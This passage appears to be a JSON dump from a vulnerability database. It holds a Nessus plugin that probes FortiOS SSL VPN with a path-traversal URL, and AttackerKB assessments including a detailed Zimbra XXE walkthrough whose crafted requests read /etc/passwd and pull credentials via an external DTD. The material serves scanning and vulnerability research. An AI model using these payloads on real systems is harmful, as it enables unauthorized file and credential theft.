Check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a directory traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of FortiOS 5.6.3 prior to 5.6.8 or 6.0.x prior to 6.0.5. It is, therefore,\naffected by a directory traversal vulnerability in the SSL VPN web portal, due to improper sanitization of path \ntraversal characters in URLs. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP \nrequest, to download arbitrary FortiOS system files.\");\n # https://fortiguard.com/psirt/FG-IR-18-384\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa8b8063\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Fortinet FortiOS version to 5.6.8, 6.0.5, 6.2.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-13379\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Fortinet FortiGate SSL VPN File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fortinet:fortios\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('http.inc');\ninclude('spad_log_func.inc');\n\nport = get_http_port(default:443);\nurl = '/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession';\n\nresponse = http_send_recv3(\n method:'GET',\n item:url,\n port:port,\n exit_on_fail:TRUE\n);\n\nspad_log(message:'Request: \\n' + http_last_sent_request() + '\\n');\nspad_log(message:'Response: \\n' + join(response) + '\\n');\n\nif ('200 OK' >!< response[0] || response[2] !~ 'var fgt_lang =') audit(AUDIT_HOST_NOT, 'affected');\n\nreport =\n '\\nNessus was able exploit this issue using the following URL :\\n' +\n '\\n' + build_url(port:port, qs:url) + '\\n' +\n '\\nThe string representation of the response from the target host was: ' + '\\n' + obj_rep(response[2]) + '\\n'; \nsecurity_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "attackerkb": [{"lastseen": "2022-05-01T00:23:07", "description": "mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability, as demonstrated by Autodiscover/Autodiscover.xml.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-29T00:00:00", "type": "attackerkb", "title": "CVE-2019-9670", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9670"], "modified": "2021-07-27T00:00:00", "id": "AKB:7FAC2D47-5477-4C40-9311-7F00D612818F", "href": "https://attackerkb.com/topics/VGqDsXYiHO/cve-2019-9670", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:18:12", "description": "Zimbra\u2019s handling of Autodiscover requests is vulnerable to XML external entity attacks, which could allow file contents to be retrieved from the remote system.\n\n \n**Recent assessments:** \n \n**jrobles-r7** at May 09, 2019 5:57pm UTC reported:\n\n## Details\n\nAccording to the blog post [A Saga of Code Executions on Zimbra](<https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html>) by An Trinh the XXE vulnerability occurs during the handling of Autodiscover requests. The commit diff for the changes that fixed the XXE issue can be found in Zimbra\u2019s github page for the [zm-mailbox repository](<https://github.com/Zimbra/zm-mailbox/commit/e859950cea04f93ea101a6bdcc7ac4912efcef8e#diff-d9e2be9710e802c4002ed02015522784>). In the `AutoDiscoverServlet.java` file the changes show modifications to wrap `DocumentBuilderFactory` in a function that disables multiple features for the instantiated factory.\n\nBy viewing the `AutoDiscoverServlet.java` file before the changes and tracking how `DocumentBuilderFactory` is used we can find the XXE vulnerability. One instance of `DocumentBuilderFactory` is in the `doPost` function. Lines 168-201 shows the beginning of the `doPost` function.\n \n \n 168 public void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {\n 169 ZimbraLog.clearContext();\n 170 addRemoteIpToLoggingContext(req);\n 171\n 172 log.info(\"Handling autodiscover request...\");\n 173\n 174 byte[] reqBytes = null;\n 175 reqBytes = ByteUtil.getContent(req.getInputStream(), req.getContentLength());\n 176 if (reqBytes == null) {\n 177 log.warn(\"No content found in the request\");\n 178 sendError(resp, 600, \"No content found in the request\");\n 179 return;\n 180 }\n 181 String content = new String(reqBytes, \"UTF-8\");\n <snip>\n 196\n 197 try {\n 198 DocumentBuilderFactory docBuilderFactory = DocumentBuilderFactory.newInstance();\n 199 DocumentBuilder docBuilder = docBuilderFactory.newDocumentBuilder();\n 200 Document doc = docBuilder.parse(new InputSource(new StringReader(content)));\n 201 NodeList nList = doc.getElementsByTagName(\"Request\");\n \n\nOn line 200 the request body contents are parse by the application. Since the request contents are parse on line 200 before any other checks (other than an empty contents check) we should be able to get XXE at this location of the code. The following request will trigger the XXE:\n \n \n POST /service/autodiscover HTTP/1.1\n Host: zimbra.mylocaldomain.local:8443\n Content-Length: 102\n \n \n <!DOCTYPE foo [<!ELEMENT foo ANY>\n <!ENTITY % test SYSTEM \"http://172.22.222.136:8000/test\">\n %test;]>\n \n\nThe following is the response from the server:\n \n \n HTTP/1.1 400 Body cannot be parsed\n Date: Tue, 02 Apr 2019 13:14:39 GMT\n Content-Type: text/html;charset=iso-8859-1\n Cache-Control: must-revalidate,no-cache,no-store\n Content-Length: 276\n \n <html>\n <head>\n <meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\"/>\n <title>Error 400 Body cannot be parsed</title>\n </head>\n <body><h2>HTTP ERROR 400</h2>\n <p>Problem accessing /service/autodiscover. Reason:\n <pre> Body cannot be parsed</pre></p>\n </body>\n </html>\n \n\nAlthough the response does not contain any useful information, we can see that the server reached out to request the file specified in the `test` entity:\n \n \n $ python -m SimpleHTTPServer 8000\n Serving HTTP on 0.0.0.0 port 8000 ...\n 172.22.222.111 - - [02/Apr/2019 08:13:26] code 404, message File not found\n 172.22.222.111 - - [02/Apr/2019 08:13:26] \"GET /test HTTP/1.1\" 404 -\n \n\nSince we can get the application to reach out for a file we can include an external DTD file to include additional entities. However, An Trinh\u2019s blog post mentions that the vulnerability allows direct file extraction through the response. Our response does not contain anything useful so far. In lines 203-234 we can see xml data being checked for `EmailAddress` and `AcceptableResponseSchema`. There are also some error checks based on the data in those fields.\n \n \n 203 for (int i = 0; i < nList.getLength(); i++) {\n 204 Node node = nList.item(i);\n 205 if (node.getNodeType() == Node.ELEMENT_NODE) {\n 206 Element element = (Element) node;\n 207 email = getTagValue(\"EMailAddress\", element);\n 208 responseSchema = getTagValue(\"AcceptableResponseSchema\", element);\n 209\n 210 if (email != null)\n 211 break;\n 212 }\n 213 }\n 214 } catch (Exception e) {\n 215 log.warn(\"cannot parse body: %s\", content);\n 216 sendError(resp, HttpServletResponse.SC_BAD_REQUEST, \"Body cannot be parsed\");\n 217 return;\n 218 }\n 219\n 220 //Return an error if there's no email address specified!\n 221 if (email == null || email.length() == 0) {\n 222 log.warn(\"No Email address is specified in the Request, %s\", content);\n 223 sendError(resp, HttpServletResponse.SC_BAD_REQUEST, \"No Email address is specified in the Request\");\n 224 return;\n 225 }\n 226\n 227 //Return an error if the response schema doesn't match ours!\n 228 if (responseSchema != null && responseSchema.length() > 0) {\n 229\n 230 if (!(responseSchema.equals(NS_MOBILE) || responseSchema.equals(NS_OUTLOOK))) {\n 231 log.warn(\"Requested response schema not available \" + responseSchema);\n 232 sendError(resp, HttpServletResponse.SC_SERVICE_UNAVAILABLE,\n 233 \"Requested response schema not available \" + responseSchema);\n 234 return;\n \n\nChecks for the data in `EMailAddress` and `AcceptableResponseSchema` are performed on lines 221, 228, and 230. If a response schema is specified but it is not one of the predefined values then lines 232-233 are executed, which includes the provided response schema in the error messages. The following request can be used to verify the described behavior:\n \n \n POST /service/autodiscover HTTP/1.1\n Host: zimbra.mylocaldomain.local:8443\n Content-Length: 117\n \n <Request>\n <EMailAddress>email</EMailAddress>\n <AcceptableResponseSchema>mytest</AcceptableResponseSchema>\n </Request>\n \n\nAs shown in the following response `mytest` is reflected back:\n \n \n HTTP/1.1 503 Requested response schema not available mytest\n Date: Tue, 02 Apr 2019 13:34:59 GMT\n Content-Type: text/html;charset=iso-8859-1\n Cache-Control: must-revalidate,no-cache,no-store\n Content-Length: 326\n \n <html>\n <head>\n <meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\"/>\n <title>Error 503 Requested response schema not available mytest</title>\n </head>\n <body><h2>HTTP ERROR 503</h2>\n <p>Problem accessing /service/autodiscover. Reason:\n <pre> Requested response schema not available mytest</pre></p>\n </body>\n </html>\n \n\nTo retrieve a file from the system we can define an entity and include it as the `AcceptableResponseSchema` as shown in the following request:\n \n \n POST /service/autodiscover HTTP/1.1\n Host: zimbra.mylocaldomain.local:8443\n Content-Length: 198\n \n <!DOCTYPE foo [<!ELEMENT foo ANY>\n <!ENTITY test SYSTEM \"file:///etc/passwd\">]>\n <Request>\n <EMailAddress>email</EMailAddress>\n <AcceptableResponseSchema>&test;</AcceptableResponseSchema>\n </Request>\n \n\nThe response will contain the data in `/etc/passwd`:\n \n \n <snip>\n <html>\n <head>\n <meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\"/>\n <title>Error 503 Requested response schema not available root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n <snip>\n \n\nThe blog post mentioned retrieving the `localconfig.xml` file to get credentials. To read the `localconfig.xml` file an external DTD file was used. The following request was used:\n \n \n POST /service/autodiscover HTTP/1.1\n Host: zimbra.mylocaldomain.local:8443\n Content-Length: 229\n \n <!DOCTYPE foo [<!ELEMENT foo ANY>\n <!ENTITY % remote SYSTEM \"http://172.22.222.136:8000/test\">\n %remote;\n ]>\n <Request>\n <EMailAddress>email</EMailAddress>\n <AcceptableResponseSchema>&myfile;</AcceptableResponseSchema>\n </Request>\n \n\nThe `myfile` entity is defined in the external DTD. The full contents of the external DTD is the following:\n \n \n <!ENTITY % test SYSTEM \"file:///opt/zimbra/conf/localconfig.xml\">\n <!ENTITY % eval \"<!ENTITY myfile '<![CDATA[%test;]]>'>\">\n %eval;\n \n\nThe following is a partial server response:\n\n\u201d` \n`<snip>` \n`<html>` \n`<head>` \n`<meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\"/>` \n`<title>`Error 503 Requested response schema not available &lt;localconfig&gt; \n&lt;key name=&quot;ssl_\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-05-29T00:00:00", "type": "attackerkb", "title": "Zimbra Collaboration Suite Autodiscover XXE", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9670"], "modified": "2020-02-13T00:00:00", "id": "AKB:0DE629AA-DABB-4803-9039-23808F323AAF", "href": "https://attackerkb.com/topics/7bMNsBStux/zimbra-collaboration-suite-autodiscover-xxe", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-01T18:01:45", "description": "Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-03-25T00:00:00", "type": "attackerkb", "title": "CVE-2019-7609", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-7609"], "modified": "2020-10-20T00:00:00", "id": "AKB:3952126D-15AF-4EBB-9948-7D4C5EA8FDB1", "href": "https://attackerkb.com/topics/eKp4N3sFs6/cve-2019-7609", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-16T02:38:13", "description": "VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector address have a command injection vulnerability.\n\nFollowing speculation that CVE-2020-4006 might be related to the SolarWinds supply chain hack that led to the compromise of U.S. government agencies and global organizations, [VMware said on December 22, 2020](<https://blogs.vmware.com/partnernews/2020/12/statement-on-solarwinds-supply-chain-compromise-and-workspace-one.html>) that they have no indication they have any involvement on the nation-state attack on SolarWinds.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at December 10, 2020 7:54pm UTC reported:\n\nI\u2019ve seen some news headlines with very scary-sounding words (\u201cransacking networks!\u201d) on this, which is dismaying. It\u2019s completely understandable that folks would be alarmed by a zero-day (now patched), but when we get into the details of this one a bit, I would tend to doubt that it\u2019s going to be a good candidate for mass exploitation (note that I\u2019m not telling anyone not to patch, just that headlines aren\u2019t always reality!).\n\nEven before getting into the weeds a little more, we can see from the [CVSSv3 metrics](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) that this **requires high-privileged access** and carries a 7.2 severity rating. I\u2019ve watched researchers prove severity ratings wrong in the past, to be sure, but [looking at the advisory](<https://www.vmware.com/security/advisories/VMSA-2020-0027.html>), we can see that any attempt at exploitation would require an attacker to have access to the admin configurator on port 8443, plus admin credentials for the configurator account. If you have that level of access as an attacker, you can do all sorts of nefarious things with it, but those requirements don\u2019t lend themselves to easy exploitation. It\u2019s a good one to patch, but it also sounds like this is another case where strong password policies (especially for admin accounts!) would go a long way toward mitigating the risk of vulns both known and unknown. Ensuring that management interfaces are not exposed to the internet is another good move!\n\nThe NSA reported this vulnerability to VMware directly as a zero-day, which likely means they were seeing a specific threat actor deploy it in targeted intelligence operations. We haven\u2019t seen any other reports of exploitation yet. From reading [the docs](<https://docs.vmware.com/en/VMware-Workspace-ONE-Access/20.10/workspace_one_access_install/GUID-6EF14E22-3B13-4163-9B3E-25E19A2E192B.html>), it looks like admins are required to change the password upon configuration, so the tried and true combo of `admin:admin` shouldn\u2019t be possible.\n\n**wvu-r7** at May 10, 2021 10:28pm UTC reported:\n\nI\u2019ve seen some news headlines with very scary-sounding words (\u201cransacking networks!\u201d) on this, which is dismaying. It\u2019s completely understandable that folks would be alarmed by a zero-day (now patched), but when we get into the details of this one a bit, I would tend to doubt that it\u2019s going to be a good candidate for mass exploitation (note that I\u2019m not telling anyone not to patch, just that headlines aren\u2019t always reality!).\n\nEven before getting into the weeds a little more, we can see from the [CVSSv3 metrics](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) that this **requires high-privileged access** and carries a 7.2 severity rating. I\u2019ve watched researchers prove severity ratings wrong in the past, to be sure, but [looking at the advisory](<https://www.vmware.com/security/advisories/VMSA-2020-0027.html>), we can see that any attempt at exploitation would require an attacker to have access to the admin configurator on port 8443, plus admin credentials for the configurator account. If you have that level of access as an attacker, you can do all sorts of nefarious things with it, but those requirements don\u2019t lend themselves to easy exploitation. It\u2019s a good one to patch, but it also sounds like this is another case where strong password policies (especially for admin accounts!) would go a long way toward mitigating the risk of vulns both known and unknown. Ensuring that management interfaces are not exposed to the internet is another good move!\n\nThe NSA reported this vulnerability to VMware directly as a zero-day, which likely means they were seeing a specific threat actor deploy it in targeted intelligence operations. We haven\u2019t seen any other reports of exploitation yet. From reading [the docs](<https://docs.vmware.com/en/VMware-Workspace-ONE-Access/20.10/workspace_one_access_install/GUID-6EF14E22-3B13-4163-9B3E-25E19A2E192B.html>), it looks like admins are required to change the password upon configuration, so the tried and true combo of `admin:admin` shouldn\u2019t be possible.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-11-23T00:00:00", "type": "attackerkb", "title": "CVE-2020-4006", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-4006"], "modified": "2020-12-28T00:00:00", "id": "AKB:A9AE03FD-3BC8-4CF3-AD03-9708A6A4FFA2", "href": "https://attackerkb.com/topics/2DKGb1v8mA/cve-2020-4006", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-02T18:16:25", "description": "A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. Cisco has released firmware updates that address this vulnerability.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-01-24T00:00:00", "type": "attackerkb", "title": "CVE-2019-1653", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1653"], "modified": "2020-10-07T00:00:00", "id": "AKB:D87D8B3A-B6C4-4B59-A2EF-577C30171961", "href": "https://attackerkb.com/topics/O87dIOaTb1/cve-2019-1653", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-29T05:41:46", "description": "In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability .\n\n \n**Recent assessments:** \n \n**dmelcher5151** at April 15, 2020 4:11pm UTC reported:\n\nCan download the session DB in one request and escalate to admin on the VPN concentrator. May not be configured to log unauthenticated requests. Causes massive damage. If not patched, likely wrecked.\n\n**hrbrmstr** at May 12, 2020 7:55pm UTC reported:\n\nCan download the session DB in one request and escalate to admin on the VPN concentrator. May not be configured to log unauthenticated requests. Causes massive damage. If not patched, likely wrecked.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-05-08T00:00:00", "type": "attackerkb", "title": "CVE-2019-11510", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-07-27T00:00:00", "id": "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "href": "https://attackerkb.com/topics/lx3Afd7fbJ/cve-2019-11510", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-24T02:05:20", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n\n \n**Recent assessments:** \n \n**ccondon-r7** at February 24, 2021 11:19pm UTC reported:\n\nUpdate March 3: Exploitation in the wild was confirmed over the weekend. See the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972?referrer=assessment#rapid7-analysis>) for more updates.\n\nThere are [reports of opportunistic scanning](<https://twitter.com/bad_packets/status/1364661586070102016>) for vulnerable vCenter Server endpoints and a bunch of PoC that\u2019s made its way to GitHub over the past twelve hours or so. There hasn\u2019t been confirmation of in-the-wild exploitation yet, but it\u2019s hard to imagine that lasting for very long given the enterprise-grade incentives for attackers. As **@wvu-r7** points out in the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972#rapid7-analysis>), the update available for folks on vulnerable versions of vCenter Server merely adds authentication, addressing the attack chain rather than resolving the root cause of the vulnerability; I\u2019d be a little surprised if we didn\u2019t see a follow-on CVE at some point for an authentication bypass.\n\n**wvu-r7** at February 24, 2021 10:11pm UTC reported:\n\nUpdate March 3: Exploitation in the wild was confirmed over the weekend. See the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972?referrer=assessment#rapid7-analysis>) for more updates.\n\nThere are [reports of opportunistic scanning](<https://twitter.com/bad_packets/status/1364661586070102016>) for vulnerable vCenter Server endpoints and a bunch of PoC that\u2019s made its way to GitHub over the past twelve hours or so. There hasn\u2019t been confirmation of in-the-wild exploitation yet, but it\u2019s hard to imagine that lasting for very long given the enterprise-grade incentives for attackers. As **@wvu-r7** points out in the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972#rapid7-analysis>), the update available for folks on vulnerable versions of vCenter Server merely adds authentication, addressing the attack chain rather than resolving the root cause of the vulnerability; I\u2019d be a little surprised if we didn\u2019t see a follow-on CVE at some point for an authentication bypass.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T00:00:00", "type": "attackerkb", "title": "VMware vSphere Client Unauth Remote Code Execution Vulnerability \u2014 CVE-2021-21972", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-04-05T00:00:00", "id": "AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "href": "https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Improper 